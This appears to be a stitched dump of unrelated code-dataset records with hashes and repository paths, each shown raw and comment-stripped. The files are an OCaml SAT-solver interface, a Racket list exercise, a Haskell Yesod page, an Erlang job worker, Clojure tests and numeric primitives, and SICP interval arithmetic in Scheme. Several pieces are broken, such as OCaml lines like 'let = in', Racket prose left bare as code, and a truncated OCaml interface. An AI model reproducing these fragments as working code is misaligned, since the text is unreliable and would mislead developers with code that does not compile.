let trans_vv sv1 sv2 = [[(sv1, true);(sv2,false)];[(sv1, false);(sv2,true)]]
let negVar v f = List.map (List.map (fun (c,b)-> if c=v then c,not b else c,b)) f
let rec tauto l = match l with
| [] -> false
| (c,b)::t-> (List.exists (fun (v,b1)-> c=v && b<>b1) t) || (tauto t)
let neg_f f =
let f = List.map (List.map (fun (c,b)-> c,not b)) f in
if f=[] then f
else List.fold_left (fun a c->
let r = List.concat (List.map (fun c-> List.map (fun d-> c::d) a) c) in
List.filter (fun c->not (tauto c)) r) (List.map (fun c-> [c]) (List.hd f)) (List.tl f)
let mkOr f1 f2 =
let l = List.map (fun l -> List.map (fun l2 -> l@l2) f2) f1 in
List.filter (fun c-> not (tauto c)) (List.concat l)
let mkExists vl f =
let fv = List.fold_left (fun a c-> a@ (List.map fst c)) [] f in
let vl = List.filter (fun c-> List.mem c fv) vl in
List.fold_left (fun f v-> mkOr f (negVar v f)) f vl
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst) (c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst) (c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let ht = Hashtbl.create 20 in
let tp = ref 0 in
let get_var v = let v = Sv.string_of v in try Hashtbl.find ht v with | Not_found -> (tp:= !tp+1; Hashtbl.add ht v !tp;!tp) in
let trans_eq (v1,v2,c) = match c with
| C_top -> xorc (get_var v1) (get_var v2)
| PVar v3-> xor (get_var v1) (get_var v2) (get_var v3) in
let ante_f =
let eqs = List.map trans_eq a_l_eqs in
let a_ev = List.map get_var a_ev in
mkExists a_ev (List.concat (nz::eqs)) in
let conseq_f =
let c_ev = List.map get_var c_ev in
let eqs = List.map trans_eq c_l_eqs in
let c_subst = List.map (fun (v1,v2) -> trans_vv (get_var v1)(get_var v2)) c_subst_vars in
let c_const = List.map (fun (v,b) -> [[(get_var v, b)]]) c_const_vars in
let r = List.concat (nz::eqs@c_subst@c_const) in
let r = List.map (List.filter (fun (c,_)-> not (List.mem c c_ev))) (neg_f r) in
List.filter (fun c-> c<>[]) r in
let all_f = ante_f@conseq_f in
if all_f<>[] then
not (check_problem_through_file (cnf_to_string !tp (ante_f@conseq_f)) 0.)
else true
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst)
(c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst) (c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let nzsf l = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) l ) in
let pr_list f l = String.concat " \n " ( List.map f l ) in
let pr_pair f1 f2 ( ) = " ( " ^(f1 x1)^","^(f2 x2)^ " ) " in
let anzs = nzsf a_nz_cons in
let cnzs = nzsf c_nz_cons in
let aeqss = string_of_eq_l a_l_eqs in
let = in
print_string ( " MINISAT IMPLY\n ante : nz : " ^anzs^";\n ex : " ^(pr_list Sv.string_of a_ev)^";\n eqs : " ^aeqss^";\n " ) ;
print_string ( " conseq : nz : " ^cnzs^";\n ex : " ^(pr_list Sv.string_of c_ev)^";\n veq : " ^cvel^";\n cons : " ^consl^";\n eqs : " ^ceqss^";\n " ) ;
let r = call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons c_l_eqs c_const_vars c_subst_vars in
( " r : " ^(string_of_bool r ) ) ;
r
let call_sat non_zeros eqs =
let ht = Hashtbl.create 20 in
let tp = ref 0 in
let get_var v = let v = Sv.string_of v in try Hashtbl.find ht v with | Not_found ->
(tp:= !tp+1;
( v^ " " ^(string_of_int ! tp)^"\n " ) ;
let input =
let eqs = List.map ( fun (v1,v2,c)->
let sv1 = get_var v1 in
let sv2 = get_var v2 in
match c with
| C_top -> xorc sv1 sv2
| PVar v3-> xor sv1 sv2 (get_var v3) ) eqs in
List.concat (nz::eqs) in
if input<> [] then
let input_str = cnf_to_string !tp input in
( input_str^"\n " ) ;
check_problem_through_file input_str minisat_timeout_limit
else true
let call_sat non_zeros eqs =
let nzs = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) non_zeros ) in
let = string_of_eq_l eqs in
let r = call_sat non_zeros eqs in
( " r : " ^(string_of_bool r)^"\n " ) ;
end;;
module Solver_Z3 = Share_prover.Dfrac_s_solver(Ts)(Share_prover.Sv)(Ss_Z3_proc)
module Solver_mini = Share_prover.Dfrac_s_solver(Share_prover.Ts)(Share_prover.Sv)(Ss_minisat_proc)
module Solver = Solver_mini
module Eqs =
struct
type var = Sv.t
type const = Ts.stree
type pcvar = Solver.frac_perm
type eq = Solver.eq
type eq_syst = Solver.eq_syst
let mkVar = Sv.var_of
let mkEq v1 v2 v3 = (v1,v2,v3)
let mkEqS l1 l2 l3 l4 l5= {Solver.eqs_ex = l1; Solver.eqs_nzv = l2; Solver.eqs_ve=l3; Solver.eqs_vc=l4; Solver.eqs_eql = l5}
let mkcFull = Ts.top
let mkcEmpty = Ts.bot
let mkcNode = Ts.mkNode
let mkpcCnst c = Solver.Cperm c
let mkpcVar v = Solver.Vperm v
end;;
type cmd =
| Sat of Eqs.eq_syst
| Imply of Eqs.eq_syst * Eqs.eq_syst;;
|
a033a05b7ad875363969db6a26cb9af8c6722080686ca9eb5bc06113361800bd | eareese/htdp-exercises | 140-all-true.rkt | #lang htdp/bsl
Exercise 140 . Design the function all - true , which consumes a list of Boolean values and determines whether all of them are # true . In other words , if there is any # false on the list , the function produces # false .
; A List-of-booleans is one of:
; – '()
; – (cons Boolean List-of-booleans)
; List-of-booleans -> Boolean
; determines whether all of the list items are true. If there is
; any #false on the list, the function produces #false.
(check-expect (all-true (cons #t '())) #t)
(check-expect (all-true (cons #t (cons #f '()))) #f)
(check-expect (all-true '()) #t)
(define (all-true alob)
(cond [(empty? alob) #t]
[(cons? alob)
(if (false? (first alob)) #f (all-true (rest alob)))]))
Now design one - true , a function that consumes a list of Boolean values and determines whether at least one item on the list is # true .
; List-of-booleans -> Boolean
determines whether AT LEAST ONE item on the list is # true .
(check-expect (one-true '()) #f)
(check-expect (one-true (cons #t '())) #t)
(check-expect (one-true (cons #t (cons #f (cons #f '())))) #t)
(check-expect (one-true (cons #f (cons #f (cons #t '())))) #t)
(check-expect (one-true (cons #f '())) #f)
(define (one-true alob)
(cond [(empty? alob) #f]
[(cons? alob)
(if (eq? #t (first alob)) #t (one-true (rest alob)))]))
| null | https://raw.githubusercontent.com/eareese/htdp-exercises/a85ff3111d459dda0e94d9b463d01a09accbf9bf/part02-arbitrarily-large-data/140-all-true.rkt | racket | A List-of-booleans is one of:
– '()
– (cons Boolean List-of-booleans)
List-of-booleans -> Boolean
determines whether all of the list items are true. If there is
any #false on the list, the function produces #false.
List-of-booleans -> Boolean | #lang htdp/bsl
Exercise 140 . Design the function all - true , which consumes a list of Boolean values and determines whether all of them are # true . In other words , if there is any # false on the list , the function produces # false .
(check-expect (all-true (cons #t '())) #t)
(check-expect (all-true (cons #t (cons #f '()))) #f)
(check-expect (all-true '()) #t)
(define (all-true alob)
(cond [(empty? alob) #t]
[(cons? alob)
(if (false? (first alob)) #f (all-true (rest alob)))]))
Now design one - true , a function that consumes a list of Boolean values and determines whether at least one item on the list is # true .
determines whether AT LEAST ONE item on the list is # true .
(check-expect (one-true '()) #f)
(check-expect (one-true (cons #t '())) #t)
(check-expect (one-true (cons #t (cons #f (cons #f '())))) #t)
(check-expect (one-true (cons #f (cons #f (cons #t '())))) #t)
(check-expect (one-true (cons #f '())) #f)
(define (one-true alob)
(cond [(empty? alob) #f]
[(cons? alob)
(if (eq? #t (first alob)) #t (one-true (rest alob)))]))
|
b4ec461ed5d7f937c300697d78732fcc76c30ae3460fe61fd4af2bed742ca5f0 | e-bigmoon/haskell-blog | RequestInformation.hs | #!/usr/bin/env stack
{- stack repl --resolver lts-15.4
--package text
--package yesod
-}
# LANGUAGE MultiParamTypeClasses #
# LANGUAGE OverloadedStrings #
{-# LANGUAGE QuasiQuotes #-}
{-# LANGUAGE TemplateHaskell #-}
# LANGUAGE TypeFamilies #
import Data.List (sortOn)
import Data.Text (Text)
import Yesod
data Person = Person
{ personName :: Text
, personAge :: Int
}
people :: [Person]
people =
[ Person "Miriam" 25
, Person "Eliezer" 3
, Person "Michael" 26
, Person "Gavriella" 1
]
data App = App
mkYesod "App" [parseRoutes|
/ HomeR GET
|]
instance Yesod App
instance RenderMessage App FormMessage where
renderMessage _ _ = defaultFormMessage
getHomeR :: Handler Html
getHomeR = defaultLayout
[whamlet|
<p>
<a href="?sort=name">Sort by name
|
<a href="?sort=age">Sort by age
|
<a href="?">No sort
^{showPeople}
|]
showPeople :: Widget
showPeople = do
msort <- runInputGet $ iopt textField "sort"
let people' =
case msort of
Just "name" -> sortOn personName people
Just "age" -> sortOn personAge people
_ -> people
[whamlet|
<dl>
$forall person <- people'
<dt>#{personName person}
<dd>#{show $ personAge person}
|]
main :: IO ()
main = warp 3000 App
| null | https://raw.githubusercontent.com/e-bigmoon/haskell-blog/5c9e7c25f31ea6856c5d333e8e991dbceab21c56/sample-code/yesod/ch13/RequestInformation.hs | haskell | stack repl --resolver lts-15.4
--package text
--package yesod
# LANGUAGE QuasiQuotes #
# LANGUAGE TemplateHaskell # | #!/usr/bin/env stack
# LANGUAGE MultiParamTypeClasses #
# LANGUAGE OverloadedStrings #
# LANGUAGE TypeFamilies #
import Data.List (sortOn)
import Data.Text (Text)
import Yesod
data Person = Person
{ personName :: Text
, personAge :: Int
}
people :: [Person]
people =
[ Person "Miriam" 25
, Person "Eliezer" 3
, Person "Michael" 26
, Person "Gavriella" 1
]
data App = App
mkYesod "App" [parseRoutes|
/ HomeR GET
|]
instance Yesod App
instance RenderMessage App FormMessage where
renderMessage _ _ = defaultFormMessage
getHomeR :: Handler Html
getHomeR = defaultLayout
[whamlet|
<p>
<a href="?sort=name">Sort by name
|
<a href="?sort=age">Sort by age
|
<a href="?">No sort
^{showPeople}
|]
showPeople :: Widget
showPeople = do
msort <- runInputGet $ iopt textField "sort"
let people' =
case msort of
Just "name" -> sortOn personName people
Just "age" -> sortOn personAge people
_ -> people
[whamlet|
<dl>
$forall person <- people'
<dt>#{personName person}
<dd>#{show $ personAge person}
|]
main :: IO ()
main = warp 3000 App
|
71121af594b68b89fc2410603cd4154c0331c18bdc0447131f2a8b41f6bf857f | bondy-io/bondy | bondy_jobs_worker.erl | %% =============================================================================
%% bondy_jobs_worker .erl -
%%
Copyright ( c ) 2016 - 2022 Leapsight . All rights reserved .
%%
Licensed under the Apache License , Version 2.0 ( the " License " ) ;
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% -2.0
%%
%% Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an " AS IS " BASIS ,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% =============================================================================
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-module(bondy_jobs_worker).
-behaviour(gen_server).
-include("bondy.hrl").
-define(SERVER_NAME(Index), {?MODULE, Index}).
-type execute_fun() :: fun(() -> any()).
-record(state, {
index :: integer()
}).
%% API
-export([start_link/1]).
-export([pick/1]).
-export([execute/2]).
-export([execute/3]).
-export([execute/4]).
-export([async_execute/2]).
-export([async_execute/3]).
GEN_SERVER
-export([code_change/3]).
-export([handle_call/3]).
-export([handle_cast/2]).
-export([handle_info/2]).
-export([init/1]).
-export([terminate/2]).
%% =============================================================================
%% API
%% =============================================================================
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
start_link(Index) ->
ServerName = {via, gproc, bondy_gproc:local_name(?SERVER_NAME(Index))},
gen_server:start_link(ServerName, ?MODULE, [?JOBS_POOLNAME, Index], []).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec pick(RealmUri :: binary()) -> pid().
pick(RealmUri) when is_binary(RealmUri) ->
gproc_pool:pick_worker(?JOBS_POOLNAME, RealmUri).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec execute(Server :: pid(), Fun :: execute_fun())->
ok.
execute(Server, Fun) ->
execute(Server, Fun, []).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec execute(Server :: pid(), Fun :: execute_fun(), Args :: [any()]) ->
ok.
execute(Server, Fun, Args) ->
execute(Server, Fun, Args, infinity).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec execute(
Server :: pid(),
Fun :: execute_fun(),
Args :: [any()],
Timetout :: timeout()) -> ok.
execute(Server, Fun, Args, Timeout) when is_function(Fun, length(Args) + 1) ->
gen_server:call(Server, {execute, Fun, Args}, Timeout).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec async_execute(Server :: pid(), Fun :: execute_fun()) ->
ok.
async_execute(Server, Fun) ->
async_execute(Server, Fun, []).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec async_execute(Server :: pid(), Fun :: execute_fun(), Args :: [any()]) ->
ok.
async_execute(Server, Fun, Args) ->
gen_server:cast(Server, {execute, Fun, Args}).
%% =============================================================================
GEN_SERVER
%% =============================================================================
init([PoolName, Index]) ->
%% We connect this worker to the pool worker name
WorkerName = ?SERVER_NAME(Index),
true = gproc_pool:connect_worker(PoolName, WorkerName),
State = #state{
index = Index
},
{ok, State}.
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
handle_call({execute, Fun, []}, _From, State) ->
try
Fun()
catch
_:Reason ->
{error, Reason}
end,
{reply, ok, State};
handle_call({execute, Fun, Args}, _From, State) ->
try
erlang:apply(Fun, Args)
catch
_:Reason ->
{error, Reason}
end,
{reply, ok, State};
handle_call(Event, From, State) ->
?LOG_WARNING(#{
reason => unsupported_event,
event => Event,
from => From
}),
{reply, {error, {unsupported_call, Event}}, State}.
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
handle_cast({execute, Fun, []}, State) ->
try
Fun()
catch
_:Reason:Stacktrace ->
?LOG_ERROR(#{
description => "Error during async execute",
reason => Reason,
stacktrace => Stacktrace
})
end,
{noreply, State};
handle_cast({execute, Fun, Args}, State) ->
try
erlang:apply(Fun, Args)
catch
_:Reason:Stacktrace ->
?LOG_ERROR(#{
description => "Error during async execute",
reason => Reason,
stacktrace => Stacktrace
})
end,
{noreply, State};
handle_cast(Event, State) ->
?LOG_WARNING(#{
reason => unsupported_event,
event => Event
}),
{noreply, State}.
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
handle_info({'ETS-TRANSFER', _, _, _}, State) ->
%% The trie ets tables uses bondy_table_owner.
%% We ignore as tables are named.
{noreply, State};
handle_info({nodeup, _Node} = Event, State) ->
?LOG_DEBUG(#{
event => Event
}),
{noreply, State};
handle_info({nodedown, _Node} = Event, State) ->
%% A connection with node has gone down
?LOG_DEBUG(#{
event => Event
}),
TODO deactivate ( keep a bloomfilter or list ) to filter
%% future searches or delete?
{noreply, State};
handle_info(Info, State) ->
?LOG_DEBUG(#{
reason => unexpected_event,
event => Info
}),
{noreply, State}.
terminate(normal, _State) ->
ok;
terminate(shutdown, _State) ->
ok;
terminate({shutdown, _}, _State) ->
ok;
terminate(_Reason, _State) ->
TODO publish metaevent
ok.
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
| null | https://raw.githubusercontent.com/bondy-io/bondy/a1267e7e5526db24f278e12315020753f3168b44/apps/bondy/src/bondy_jobs_worker.erl | erlang | =============================================================================
bondy_jobs_worker .erl -
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
-2.0
Unless required by applicable law or agreed to in writing, software
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=============================================================================
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
API
=============================================================================
API
=============================================================================
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
=============================================================================
=============================================================================
We connect this worker to the pool worker name
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
The trie ets tables uses bondy_table_owner.
We ignore as tables are named.
A connection with node has gone down
future searches or delete? | Copyright ( c ) 2016 - 2022 Leapsight . All rights reserved .
Licensed under the Apache License , Version 2.0 ( the " License " ) ;
distributed under the License is distributed on an " AS IS " BASIS ,
-module(bondy_jobs_worker).
-behaviour(gen_server).
-include("bondy.hrl").
-define(SERVER_NAME(Index), {?MODULE, Index}).
-type execute_fun() :: fun(() -> any()).
-record(state, {
index :: integer()
}).
-export([start_link/1]).
-export([pick/1]).
-export([execute/2]).
-export([execute/3]).
-export([execute/4]).
-export([async_execute/2]).
-export([async_execute/3]).
GEN_SERVER
-export([code_change/3]).
-export([handle_call/3]).
-export([handle_cast/2]).
-export([handle_info/2]).
-export([init/1]).
-export([terminate/2]).
start_link(Index) ->
ServerName = {via, gproc, bondy_gproc:local_name(?SERVER_NAME(Index))},
gen_server:start_link(ServerName, ?MODULE, [?JOBS_POOLNAME, Index], []).
-spec pick(RealmUri :: binary()) -> pid().
pick(RealmUri) when is_binary(RealmUri) ->
gproc_pool:pick_worker(?JOBS_POOLNAME, RealmUri).
-spec execute(Server :: pid(), Fun :: execute_fun())->
ok.
execute(Server, Fun) ->
execute(Server, Fun, []).
-spec execute(Server :: pid(), Fun :: execute_fun(), Args :: [any()]) ->
ok.
execute(Server, Fun, Args) ->
execute(Server, Fun, Args, infinity).
-spec execute(
Server :: pid(),
Fun :: execute_fun(),
Args :: [any()],
Timetout :: timeout()) -> ok.
execute(Server, Fun, Args, Timeout) when is_function(Fun, length(Args) + 1) ->
gen_server:call(Server, {execute, Fun, Args}, Timeout).
-spec async_execute(Server :: pid(), Fun :: execute_fun()) ->
ok.
async_execute(Server, Fun) ->
async_execute(Server, Fun, []).
-spec async_execute(Server :: pid(), Fun :: execute_fun(), Args :: [any()]) ->
ok.
async_execute(Server, Fun, Args) ->
gen_server:cast(Server, {execute, Fun, Args}).
GEN_SERVER
init([PoolName, Index]) ->
WorkerName = ?SERVER_NAME(Index),
true = gproc_pool:connect_worker(PoolName, WorkerName),
State = #state{
index = Index
},
{ok, State}.
handle_call({execute, Fun, []}, _From, State) ->
try
Fun()
catch
_:Reason ->
{error, Reason}
end,
{reply, ok, State};
handle_call({execute, Fun, Args}, _From, State) ->
try
erlang:apply(Fun, Args)
catch
_:Reason ->
{error, Reason}
end,
{reply, ok, State};
handle_call(Event, From, State) ->
?LOG_WARNING(#{
reason => unsupported_event,
event => Event,
from => From
}),
{reply, {error, {unsupported_call, Event}}, State}.
handle_cast({execute, Fun, []}, State) ->
try
Fun()
catch
_:Reason:Stacktrace ->
?LOG_ERROR(#{
description => "Error during async execute",
reason => Reason,
stacktrace => Stacktrace
})
end,
{noreply, State};
handle_cast({execute, Fun, Args}, State) ->
try
erlang:apply(Fun, Args)
catch
_:Reason:Stacktrace ->
?LOG_ERROR(#{
description => "Error during async execute",
reason => Reason,
stacktrace => Stacktrace
})
end,
{noreply, State};
handle_cast(Event, State) ->
?LOG_WARNING(#{
reason => unsupported_event,
event => Event
}),
{noreply, State}.
handle_info({'ETS-TRANSFER', _, _, _}, State) ->
{noreply, State};
handle_info({nodeup, _Node} = Event, State) ->
?LOG_DEBUG(#{
event => Event
}),
{noreply, State};
handle_info({nodedown, _Node} = Event, State) ->
?LOG_DEBUG(#{
event => Event
}),
TODO deactivate ( keep a bloomfilter or list ) to filter
{noreply, State};
handle_info(Info, State) ->
?LOG_DEBUG(#{
reason => unexpected_event,
event => Info
}),
{noreply, State}.
terminate(normal, _State) ->
ok;
terminate(shutdown, _State) ->
ok;
terminate({shutdown, _}, _State) ->
ok;
terminate(_Reason, _State) ->
TODO publish metaevent
ok.
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
|
db5731c31e101b0f27e105651bf063831df6603544ec84ad56ad0450d016b873 | lambdaisland/uniontypes | uniontypes_test.cljc | (ns lambdaisland.uniontypes-test
(:require [clojure.spec.alpha :as s]
[clojure.test :refer [deftest is testing]]
[lambdaisland.uniontypes #?(:clj :refer
:cljs :refer-macros) [case-of]]
[lambdaisland.uniontypes.core :refer [case-of*]]
#?(:cljs [cljs.core :refer [ExceptionInfo]]))
#?(:clj (:import clojure.lang.ExceptionInfo)))
(defn fail []
(throw (ex-info "This code should never be reached" {})))
(s/def ::availability (s/or :sold-out #{:sold-out}
:in-stock pos-int?
:reordered (s/tuple pos-int? pos-int?)
:announced string?))
(deftest case-of-test
(testing "happy path"
(is (= "Sold out."
(case-of ::availability :sold-out
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:announced date
(str "Will be available on: " date)
:spec/invalid _
"that doesn't seem right")))
(is (= "That doesn't seem right."
(case-of ::availability {:not :valid}
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:announced date
(str "Will be available on: " date)
:spec/invalid _
"That doesn't seem right."))))
(testing "Error messages"
(try
(case-of* '(::availability availability
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:foo x
"")
false)
(fail)
(catch ExceptionInfo e
(is (= #?(:clj (.getMessage e)
:cljs (.-message e)) "The cases in this `case-of` are different from the ones in the spec:
(s/def :lambdaisland.uniontypes-test/availability
(s/or :sold-out #{:sold-out}
:in-stock pos-int?
:reordered (tuple pos-int? pos-int?)
:announced string?))
Add a case for :announced.
Remove the case :foo.")
)))))
| null | https://raw.githubusercontent.com/lambdaisland/uniontypes/d290ad10f9126c0336446d88675d9fa57dc4ca55/test/lambdaisland/uniontypes_test.cljc | clojure | (ns lambdaisland.uniontypes-test
(:require [clojure.spec.alpha :as s]
[clojure.test :refer [deftest is testing]]
[lambdaisland.uniontypes #?(:clj :refer
:cljs :refer-macros) [case-of]]
[lambdaisland.uniontypes.core :refer [case-of*]]
#?(:cljs [cljs.core :refer [ExceptionInfo]]))
#?(:clj (:import clojure.lang.ExceptionInfo)))
(defn fail []
(throw (ex-info "This code should never be reached" {})))
(s/def ::availability (s/or :sold-out #{:sold-out}
:in-stock pos-int?
:reordered (s/tuple pos-int? pos-int?)
:announced string?))
(deftest case-of-test
(testing "happy path"
(is (= "Sold out."
(case-of ::availability :sold-out
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:announced date
(str "Will be available on: " date)
:spec/invalid _
"that doesn't seem right")))
(is (= "That doesn't seem right."
(case-of ::availability {:not :valid}
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:announced date
(str "Will be available on: " date)
:spec/invalid _
"That doesn't seem right."))))
(testing "Error messages"
(try
(case-of* '(::availability availability
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:foo x
"")
false)
(fail)
(catch ExceptionInfo e
(is (= #?(:clj (.getMessage e)
:cljs (.-message e)) "The cases in this `case-of` are different from the ones in the spec:
(s/def :lambdaisland.uniontypes-test/availability
(s/or :sold-out #{:sold-out}
:in-stock pos-int?
:reordered (tuple pos-int? pos-int?)
:announced string?))
Add a case for :announced.
Remove the case :foo.")
)))))
| |
878752f5b3ee56cde9e519a75cc2defbf5e547e15375d65c2e6ccca7c6b073e3 | naoiwata/sicp | 2.1.4.scm | ;;
;; @author naoiwata
SICP Chapter2
;; 2.1.4 Extended Exercise: Interval Arithmetic
;;
(define (add-interval x y)
(make-interval
(+ (lower-bound x) (lower-bound y))
(+ (upper-bound x) (upper-bound y))))
(define (mul-interval x y)
(let
((p1 (* (lower-bound x) (lower-bound y)))
(p2 (* (lower-bound x) (upper-bound y)))
(p3 (* (upper-bound x) (lower-bound y)))
(p4 (* (upper-bound x) (lower-bound y))))
(make-interval
(min p1 p2 p3 p4)
(max p1 p2 p3 p4))))
(define (div-interval x y)
(mul-interval x
(make-interval
(/ 1.0 (upper-bound y))
(/ 1.0 (lower-bound y)))))
; END | null | https://raw.githubusercontent.com/naoiwata/sicp/7314136c5892de402015acfe4b9148a3558b1211/chapter2/pages/2.1.4.scm | scheme |
@author naoiwata
2.1.4 Extended Exercise: Interval Arithmetic
END | SICP Chapter2
(define (add-interval x y)
(make-interval
(+ (lower-bound x) (lower-bound y))
(+ (upper-bound x) (upper-bound y))))
(define (mul-interval x y)
(let
((p1 (* (lower-bound x) (lower-bound y)))
(p2 (* (lower-bound x) (upper-bound y)))
(p3 (* (upper-bound x) (lower-bound y)))
(p4 (* (upper-bound x) (lower-bound y))))
(make-interval
(min p1 p2 p3 p4)
(max p1 p2 p3 p4))))
(define (div-interval x y)
(mul-interval x
(make-interval
(/ 1.0 (upper-bound y))
(/ 1.0 (lower-bound y)))))
|
e28940010ce8fc564643531bc5cf8be99d5e633259f24d5c1ca4bf9652da4557 | cnuernber/dtype-next | primitive.clj | (ns tech.v3.datatype.primitive
(:require [tech.v3.datatype.protocols :as dtype-proto]
[tech.v3.datatype.casting :as casting]
[tech.v3.datatype.const-reader :refer [const-reader]]))
(defmacro implement-scalar-primitive
[cls prim-cls datatype]
`(do
(.put casting/class->datatype-map ~cls ~datatype)
(.put casting/class->datatype-map ~prim-cls ~datatype)
(clojure.core/extend
~cls
dtype-proto/PDatatype
{:datatype (fn [item#] ~datatype)}
dtype-proto/PElemwiseDatatype
{:elemwise-datatype (fn [item#] ~datatype)}
dtype-proto/PECount
{:ecount (fn [item#] 1)}
dtype-proto/PConstantTimeMinMax
{:has-constant-time-min-max? (constantly true)
:constant-time-min identity
:constant-time-max identity}
dtype-proto/PToReader
;;Reader conversion of primitives is inefficient so we allow it
;;but do not advertise it
{:convertible-to-reader? (constantly false)
:->reader (fn [item#]
(const-reader item# 1))})))
(implement-scalar-primitive Boolean Boolean/TYPE :boolean)
(implement-scalar-primitive Byte Byte/TYPE :int8)
(implement-scalar-primitive Short Short/TYPE :int16)
(implement-scalar-primitive Character Character/TYPE :char)
(implement-scalar-primitive Integer Integer/TYPE :int32)
(implement-scalar-primitive Long Long/TYPE :int64)
(implement-scalar-primitive Float Float/TYPE :float32)
(implement-scalar-primitive Double Double/TYPE :float64)
| null | https://raw.githubusercontent.com/cnuernber/dtype-next/4e43212942aafa0145640cf6b655bb83855f567d/src/tech/v3/datatype/primitive.clj | clojure | Reader conversion of primitives is inefficient so we allow it
but do not advertise it | (ns tech.v3.datatype.primitive
(:require [tech.v3.datatype.protocols :as dtype-proto]
[tech.v3.datatype.casting :as casting]
[tech.v3.datatype.const-reader :refer [const-reader]]))
(defmacro implement-scalar-primitive
[cls prim-cls datatype]
`(do
(.put casting/class->datatype-map ~cls ~datatype)
(.put casting/class->datatype-map ~prim-cls ~datatype)
(clojure.core/extend
~cls
dtype-proto/PDatatype
{:datatype (fn [item#] ~datatype)}
dtype-proto/PElemwiseDatatype
{:elemwise-datatype (fn [item#] ~datatype)}
dtype-proto/PECount
{:ecount (fn [item#] 1)}
dtype-proto/PConstantTimeMinMax
{:has-constant-time-min-max? (constantly true)
:constant-time-min identity
:constant-time-max identity}
dtype-proto/PToReader
{:convertible-to-reader? (constantly false)
:->reader (fn [item#]
(const-reader item# 1))})))
(implement-scalar-primitive Boolean Boolean/TYPE :boolean)
(implement-scalar-primitive Byte Byte/TYPE :int8)
(implement-scalar-primitive Short Short/TYPE :int16)
(implement-scalar-primitive Character Character/TYPE :char)
(implement-scalar-primitive Integer Integer/TYPE :int32)
(implement-scalar-primitive Long Long/TYPE :int64)
(implement-scalar-primitive Float Float/TYPE :float32)
(implement-scalar-primitive Double Double/TYPE :float64)
|
87535ad66264236cceed02eb1db1d90e1c391bca55d96085d3c9e13a8f2dfb4d | TrustInSoft/tis-interpreter | pdg_state.mli | Modified by TrustInSoft
(**************************************************************************)
(* *)
This file is part of Frama - C.
(* *)
Copyright ( C ) 2007 - 2015
CEA ( Commissariat à l'énergie atomique et aux énergies
(* alternatives) *)
(* *)
(* you can redistribute it and/or modify it under the terms of the GNU *)
Lesser General Public License as published by the Free Software
Foundation , version 2.1 .
(* *)
(* It is distributed in the hope that it will be useful, *)
(* but WITHOUT ANY WARRANTY; without even the implied warranty of *)
(* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *)
(* GNU Lesser General Public License for more details. *)
(* *)
See the GNU Lesser General Public License version 2.1
for more details ( enclosed in the file licenses / LGPLv2.1 ) .
(* *)
(**************************************************************************)
exception Cannot_fold
open PdgTypes
(** Types data_state and Node.t come froms this module *)
val make : PdgTypes.LocInfo.t -> Locations.Zone.t -> data_state
val empty : data_state
val bottom: data_state
val add_loc_node :
